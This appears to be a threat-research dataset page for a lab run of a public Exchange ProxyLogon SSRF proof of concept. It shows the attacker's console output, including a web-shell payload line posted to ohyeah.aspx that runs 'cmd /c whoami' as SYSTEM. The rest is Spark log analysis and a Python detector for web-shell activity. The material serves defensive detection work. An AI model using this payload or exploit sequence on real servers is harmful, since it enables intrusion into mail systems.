Exchange ProxyLogon SSRF RCE Vuln POC

Metadata

Author: Roberto Rodriguez @Cyb3rWard0g
Creation Date: 2021/03/14
Modification Date: 2021/03/14
Tactics: ['TA0003', 'TA0002']
Techniques: ['T1505.003']
Tags: None

Dataset Description

This dataset represents the execution of a public POC that abuses Exchange Server vulnerabilities, specifically the CVE-2021-26855 server-side request forgery (SSRF) vulnerability.

Notebooks

Notebooks created by the community leveraging the Mordor datasets (Author, Name, Link): none listed.

Simulation Plan

Environment: Lab VM
Tool Type: Manual
Module: cmd

Adversary View

C:\Users\wardog.MXS01\Documents>
C:\Users\wardog.MXS01\Documents>python public-poc.py localhost wardog@azsentinel.local
Attacking target localhost
=============================
Got DN: /o=azsentinel/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=6beef80bd6d14a68b9ae39df7f27a8cc-wardog
Got SID: S-1-5-21-594047938-393122191-2580508586-500
Got session id: e243cd06-1093-40d4-829c-63f3b9caea9b
Got canary: pYoEXlKOqkGQMt3Dv3qJUExebVlG6NgI3c_XeQNd-VRV8lo6E5zskoLPJB0uOOGITLTC08eVUkk.
Got OAB id: becafe73-b0c1-4f36-8df4-85f682840ef4
Ready!

Testing command:
===============
POST  shell:https://localhost/owa/auth/ohyeah.aspx
code":"Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").StdOut.ReadAll());


[*] Waiting for ohyeah.aspx to be available..
[*] Waiting for ohyeah.aspx to be available..

Results:
========
nt authority\system


C:\Users\wardog.MXS01\Documents>

Explore Mordor Dataset

Initialize Analytics Engine

# openhunt.mordorutils provides get_spark() and registerMordorSQLTable()
from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

# Download the zipped JSON dataset and expose it as a temporary SparkSQL view
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/proxylogon_ssrf_rce_poc.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

# Summarize which log channels and event IDs the dataset contains
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+----------------------+---------------------------------------------------+-------+-----+
|Hostname              |Channel                                            |EventID|count|
+----------------------+---------------------------------------------------+-------+-----+
|MXS01.azsentinel.local|Microsoft-Windows-Sysmon/Operational               |10     |3626 |
|MXS01.azsentinel.local|Security                                           |4658   |2398 |
|MXS01.azsentinel.local|Security                                           |4656   |1199 |
|MXS01.azsentinel.local|Security                                           |4690   |1199 |
|MXS01.azsentinel.local|Microsoft-Windows-Sysmon/Operational               |7      |427  |
|MXS01.azsentinel.local|Microsoft-Windows-Sysmon/Operational               |11     |301  |
|MXS01.azsentinel.local|Microsoft-Exchange-ActiveMonitoring/MonitorResult  |3      |293  |
|MXS01.azsentinel.local|Microsoft-Exchange-ActiveMonitoring/ResponderResult|4      |167  |
|MXS01.azsentinel.local|Security                                           |5156   |132  |
|MXS01.azsentinel.local|Microsoft-Windows-Sysmon/Operational               |12     |120  |
|MXS01.azsentinel.local|Microsoft-Windows-Sysmon/Operational               |3      |117  |
|MXS01.azsentinel.local|Security                                           |5158   |85   |
|MXS01.azsentinel.local|Security                                           |4703   |72   |
|MXS01.azsentinel.local|Microsoft-Exchange-ActiveMonitoring/ProbeResult    |2      |57   |
|MXS01.azsentinel.local|Microsoft-Windows-Sysmon/Operational               |13     |37   |
|MXS01.azsentinel.local|Security                                           |4627   |21   |
|MXS01.azsentinel.local|Security                                           |4624   |21   |
|MXS01.azsentinel.local|Security                                           |4985   |18   |
|MXS01.azsentinel.local|Application                                        |2303   |17   |
|MXS01.azsentinel.local|Security                                           |4663   |16   |
+----------------------+---------------------------------------------------+-------+-----+
only showing top 20 rows
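As an added example (not part of this dataset page, nor of the Mordor or OpenHunt code), here is a pure-Python version of the two hunts a defender would run against mordorTable for this dataset: an ASPX file being written under the Exchange FrontEnd web root (Sysmon EventID 11), and the IIS worker process w3wp.exe spawning a command shell, which is what the web shell's `cmd /c whoami` in the adversary view produces (Sysmon EventID 1). The sample events, the Exchange FrontEnd path, and the helper names are constructed for the example; the summary table above does not show EventID 1 in its top 20 rows, so the process-creation rule is the general shape of the detection rather than something the table confirms.

```python
import json
import ntpath

# Hypothetical Exchange FrontEnd path used only to build the constructed events.
EXCHANGE_FRONTEND = r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy"

# Constructed sample events in the Mordor layout (one JSON object per line).
# Field names are the Sysmon names the dataset keeps (EventID, Channel, Image,
# ParentImage, CommandLine, TargetFilename); every value is made up for this example.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"Hostname": "MXS01.azsentinel.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 11,
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": EXCHANGE_FRONTEND + r"\owa\auth\ohyeah.aspx"},
    {"Hostname": "MXS01.azsentinel.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 11,
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": r"C:\Windows\Temp\cache_0001.tmp"},          # benign write
    {"Hostname": "MXS01.azsentinel.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c whoami"},
    {"Hostname": "MXS01.azsentinel.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "ParentImage": r"C:\Windows\explorer.exe",                      # benign shell
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd"},
    {"Hostname": "MXS01.azsentinel.local", "Channel": "Security", "EventID": 4624},
])

SHELL_CHILDREN = {"cmd.exe", "powershell.exe"}


def aspx_dropped_in_frontend(target: str) -> bool:
    """Sysmon 11: a .aspx file created anywhere under the FrontEnd\\HttpProxy web root."""
    p = target.lower()
    return p.endswith(".aspx") and "\\frontend\\httpproxy\\" in p


def w3wp_spawned_shell(parent: str, image: str) -> bool:
    """Sysmon 1: the IIS worker process launching a command shell.

    ntpath is used so Windows paths split correctly even when run on Linux.
    """
    return (ntpath.basename(parent).lower() == "w3wp.exe"
            and ntpath.basename(image).lower() in SHELL_CHILDREN)


def detect_webshell_activity(jsonl: str) -> list:
    """Return one hit per Sysmon event matching either rule, in input order."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("Channel") != "Microsoft-Windows-Sysmon/Operational":
            continue
        eid = ev.get("EventID")
        if eid == 11 and aspx_dropped_in_frontend(ev.get("TargetFilename", "")):
            hits.append({"rule": "aspx_written_to_exchange_frontend",
                         "host": ev.get("Hostname"),
                         "detail": ntpath.basename(ev["TargetFilename"])})
        elif eid == 1 and w3wp_spawned_shell(ev.get("ParentImage", ""), ev.get("Image", "")):
            hits.append({"rule": "w3wp_spawned_shell",
                         "host": ev.get("Hostname"),
                         "detail": ev.get("CommandLine", "")})
    return hits


if __name__ == "__main__":
    for hit in detect_webshell_activity(SAMPLE_EVENTS):
        print(hit)
```

The two predicates translate directly into WHERE clauses on mordorTable (EventID, Channel, TargetFilename, ParentImage and Image are the columns the dataset exposes), so the same hunt can be run in the Spark notebook above once the view is registered.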